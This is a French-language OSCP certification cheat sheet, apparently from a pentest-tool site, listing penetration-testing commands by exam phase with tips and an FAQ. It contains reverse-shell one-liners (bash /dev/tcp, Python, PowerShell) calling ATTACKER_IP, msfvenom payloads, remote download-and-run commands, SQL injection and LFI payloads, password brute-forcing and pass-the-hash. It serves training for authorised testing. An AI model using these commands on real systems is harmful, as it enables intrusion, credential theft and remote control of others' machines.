Cheatsheet OSCP 2026

150+ commandes essentielles organisées par phase de l'examen OSCP. De l'énumération initiale à l'escalade de privilèges, Active Directory, pivoting et rédaction de rapport — tout ce qu'il faut pour réussir.

Dernière mise à jour :

Navigation rapide

01 Énumération 02 Exploitation Web 03 Shells & Payloads 04 Privesc Linux 05 Privesc Windows 06 Active Directory 07 Pivoting & Tunneling 08 Attaques de mots de passe 09 Transferts de fichiers 10 Conseils d'examen

# Énumération

L'énumération, c'est tout dans l'OSCP. Passez 80% de votre temps ici. Scannez tous les ports, énumérez tous les services.

Nmap — Stratégie de scan complet

nmap -p- --min-rate=1000 -T4 TARGET_IP -oN ports.txt
Étape 1 : Scan rapide de tous les ports TCP pour découvrir les ports ouverts
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET_IP
Étape 2 : Scan ciblé avec scripts + détection de version sur les ports découverts
nmap -sU --top-ports 200 --min-rate=1000 TARGET_IP
N'oubliez pas l'UDP ! Scan des 200 ports UDP les plus courants

Énumération Web

feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak -t 50
Brute-force de répertoires avec extensions courantes (php, txt, bak sont précieux à l'OSCP)
whatweb http://TARGET && curl -s http://TARGET -I
Identifier les technologies web et les en-têtes serveur
nikto -h http://TARGET -C all
Scanner de vulnérabilités web — trouve les misconfigs et fichiers par défaut

Énumération SMB

smbclient -N -L //TARGET
Lister les partages SMB avec session null (sans mot de passe)
enum4linux-ng -A TARGET
Énumération complète SMB/RPC — utilisateurs, partages, groupes, politique de mots de passe
crackmapexec smb TARGET -u '' -p '' --shares
Énumérer les partages lisibles avec CrackMapExec

SNMP, LDAP, DNS

snmpwalk -v2c -c public TARGET 1.3.6.1.2.1
SNMP walk avec communauté "public" — peut divulguer noms d'utilisateurs, processus
ldapsearch -H ldap://TARGET -x -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName
Requête LDAP anonyme pour énumérer les utilisateurs du domaine
dig axfr @TARGET DOMAIN.LOCAL
Tentative de transfert de zone DNS

# Exploitation Web

Injection SQL, contournement d'upload, injection de commandes — les fondamentaux des boxes web OSCP.

Injection SQL

sqlmap -u "http://TARGET/page?id=1" --batch --dbs
Détection automatique de SQLi — énumération des bases de données
sqlmap -r request.txt --batch --level 5 --risk 3 --os-shell
SQLi depuis requête Burp — obtenir un shell OS si possible

Contournement d'upload de fichiers

cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
Contournement par double extension — upload en .php.jpg

Injection de commandes

; whoami
Test basique d'injection de commande (essayez aussi | whoami, `whoami`, $(whoami))

Inclusion de fichiers (LFI/RFI)

curl "http://TARGET/page?file=../../../etc/passwd"
LFI — lire /etc/passwd via traversée de répertoire
curl "http://TARGET/page?file=php://filter/convert.base64-encode/resource=config.php"
Wrapper PHP filter — lire le code source en base64

# Shells & Payloads

Reverse shells, bind shells et génération de payloads — apprenez-les par cœur pour l'examen.

Reverse Shells

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Reverse shell Bash — le classique
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Reverse shell Python3
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
Reverse shell PowerShell — pour les cibles Windows

Upgrade du shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
Étape 1 : Spawn d'un shell PTY
export TERM=xterm && stty raw -echo; fg
Étape 2 : TTY interactif complet (Ctrl+Z d'abord, puis exécutez ceci)

Payloads Msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
EXE reverse shell Windows x64
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
Binaire ELF reverse shell Linux x64

# Escalade de privilèges Linux

L'OSCP adore le privesc Linux. Vérifiez SUID, capabilities, cron jobs, chemins inscriptibles, version du kernel.

💡 Conseil OSCP : Lancez toujours LinPEAS en premier. Puis vérifiez manuellement les résultats.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Exécuter LinPEAS directement — met en évidence les vecteurs de privesc en couleur
find / -perm -4000 -type f 2>/dev/null
Trouver tous les binaires SUID — vérifiez chacun sur GTFOBins
sudo -l
Vérifier ce que vous pouvez exécuter en root — le vecteur de privesc n°1
getcap -r / 2>/dev/null
Trouver les binaires avec capabilities (cap_setuid = root instantané)
cat /etc/crontab && ls -la /etc/cron*
Vérifier les cron jobs — scripts inscriptibles exécutés en root ?
find / -writable -type f 2>/dev/null | grep -v proc
Trouver les fichiers inscriptibles par tous — potentiel de hijacking de chemin
uname -a && cat /etc/os-release
Vérifier la version du kernel — chercher des exploits kernel

# Escalade de privilèges Windows

Services, tokens, AlwaysInstallElevated, chemins de services non quotés, potatoes — les classiques OSCP.

💡 Conseil OSCP : Lancez WinPEAS + PowerUp.ps1 — ensemble ils détectent la plupart des vecteurs.
.\winPEASx64.exe
WinPEAS — vérification automatisée d'escalade de privilèges Windows
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"
PowerUp — trouve les misconfigurations, permissions faibles, chemins non quotés
whoami /priv
Vérifier les privilèges du token actuel — SeImpersonate ? SeBackup ?
.\GodPotato.exe -cmd "cmd /c whoami"
GodPotato — SYSTEM instantané depuis SeImpersonatePrivilege (fonctionne sur Windows récents)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Vérifier AlwaysInstallElevated — si 1, générer un payload MSI pour SYSTEM
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows"
Trouver les chemins de services non quotés — potentiel de hijacking de binaire

# Pivoting & Tunneling

Atteindre les réseaux internes via les machines compromises. Chisel, tunnels SSH, ligolo — indispensable pour l'OSCP.

Chisel (Recommandé)

./chisel server -p 8080 --reverse
Sur votre Kali : démarrer le serveur Chisel en mode reverse
./chisel client ATTACKER_IP:8080 R:socks
Sur la cible : connexion retour, crée un proxy SOCKS5 sur le port 1080 de Kali
proxychains4 nmap -sT -Pn -p 445,3389,5985 INTERNAL_IP
Scanner le réseau interne via le proxy SOCKS

Tunnels SSH

ssh -L 8080:INTERNAL_IP:80 user@PIVOT_IP
Port forward local — accéder au web interne sur localhost:8080
ssh -D 1080 user@PIVOT_IP
Proxy SOCKS dynamique via SSH — utiliser avec proxychains

# Attaques de mots de passe

Cracker des hash, brute-forcer des logins — hashcat et John sont vos meilleurs alliés.

hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
Cracker les hash Kerberoast (TGS-REP type 23)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
Cracker les hash AS-REP roast
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
John the Ripper — détecte automatiquement le type de hash et cracke
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
Brute-force de login web avec Hydra

# Transferts de fichiers

Transférer des outils sur la cible et exfiltrer des données. Plusieurs méthodes pour différentes situations.

Cibles Linux

python3 -m http.server 8000
Sur Kali : démarrer un serveur HTTP pour servir des fichiers
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
Sur la cible : télécharger et rendre exécutable

Cibles Windows

certutil -urlcache -split -f http://ATTACKER_IP:8000/shell.exe C:\Windows\Temp\shell.exe
Téléchargement avec Certutil — fonctionne sur la plupart des versions Windows
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/shell.exe','C:\Windows\Temp\shell.exe')"
Téléchargement PowerShell — alternative à certutil

# Conseils pour l'examen OSCP

Stratégie et état d'esprit pour les 23h45 d'examen. Ces conseils viennent de centaines d'expériences OSCP.

⏱️ Gestion du temps : Ne passez pas plus de 2 heures sur une seule machine. Si vous êtes bloqué, passez à autre chose et revenez plus tard avec un regard neuf.
📝 Documentez tout : Faites des captures d'écran à chaque étape. Ne laissez pas le rapport pour la fin — collez les preuves dans votre template pendant l'examen.
🎯 Commencez par les boxes faciles : Les machines standalone (non-AD) sont souvent plus rapides à rooter. Sécurisez ces points d'abord.
🔁 Énumérez plus profondément : Si vous êtes bloqué, vous n'avez pas assez énuméré. Relancez les scans avec d'autres wordlists, revérifiez tous les ports, regardez le code source.
🏠 Set AD = 40 points : La chaîne AD est le plus gros bloc de points. Entraînez-vous sur les boxes AD de HackTheBox et TryHackMe avant l'examen.
💤 Prenez des pauses : Dormez 2 à 4 heures pendant l'examen. Revenir reposé permet souvent de résoudre ce qui vous bloquait.

❓ Questions fréquentes sur l'OSCP

L'examen OSCP est un examen pratique de 23h45. Il comprend une chaîne Active Directory valant 40 points et 3 machines autonomes valant 20 points chacune. Il faut 70 points pour réussir. Un rapport professionnel soumis dans les 24 heures après l'examen est obligatoire.

La plupart des outils de pentest courants sont autorisés : nmap, Burp Suite, sqlmap, Metasploit (limité à une seule machine), linpeas, winpeas, crackmapexec, impacket, BloodHound. L'assistance par IA est interdite. La liste complète figure dans le guide d'examen OffSec.

L'énumération. Le consensus de la communauté OSCP est : si vous êtes bloqué, c'est que vous n'avez pas assez énuméré. Scannez les 65535 ports TCP, vérifiez l'UDP, énumérez chaque service trouvé et lisez attentivement le code source.

La plupart des candidats ont besoin de 3 à 6 mois de pratique assidue sur des plateformes comme HackTheBox, TryHackMe et les labs OffSec PG Practice. Une expérience préalable en Linux et réseau réduit considérablement le temps de préparation.

Le Kerberoasting est une attaque Active Directory qui demande des tickets de service pour les comptes ayant des SPN et les casse hors ligne. Utilisez impacket-GetUserSPNs pour extraire les hashes et hashcat (-m 13100) pour les casser avec rockyou.txt.

Sous Linux : mauvaises configurations sudo, binaires SUID, abus de tâches cron, chemins inscriptibles dans PATH. Sous Windows : SeImpersonatePrivilege (Potatoes), chemins de service non entre guillemets, AlwaysInstallElevated, DLL hijacking. Lancez toujours LinPEAS/WinPEAS d'abord.

Oui, mais sur une seule machine pendant tout l'examen (meterpreter inclus). Choisissez judicieusement — réservez-le à une machine où l'exploitation manuelle prendrait trop de temps.

L'OSCP+ est le cursus de certification actualisé d'OffSec avec des modules supplémentaires sur les attaques Active Directory, le pivoting avancé et le développement d'exploits. Le format d'examen pratique de 23h45 est identique, mais les candidats OSCP+ ont besoin de compétences AD plus solides pour compléter la chaîne.

Le Pass-the-Hash utilise un hash NTLM pour s'authentifier sans connaître le mot de passe en clair. Utilisez impacket-psexec DOMAIN/user@TARGET -hashes :NTLM_HASH ou evil-winrm -i TARGET -u user -H NTLM_HASH. Cela ne fonctionne que contre l'authentification NTLM, pas Kerberos.

Le pattern BOF OSCP : 1) fuzzer pour trouver le crash, 2) trouver l'offset exact d'EIP avec msf-pattern_create/offset, 3) identifier les bad characters, 4) trouver un gadget JMP ESP avec !mona jmp -r esp, 5) générer le shellcode avec msfvenom -p windows/shell_reverse_tcp -b BADCHARS -f python. Entraînez-vous sur la room Buffer Overflow Prep de TryHackMe.

📚 Ressources associées

Rapport de pentest assisté par IA

Transformez vos findings en rapport PDF professionnel. L'IA remplit CVE, CVSS et sévérité automatiquement.

Essayer gratuitement →

Vous voulez les 12 020+ commandes ?

Cette cheatsheet n'est que la surface. Pentest Mindmap organise 12 020+ commandes dans 34 catégories avec recherche instantanée et copie en un clic.

Créer un compte gratuit →
📎 Cette cheatsheet vous est utile ?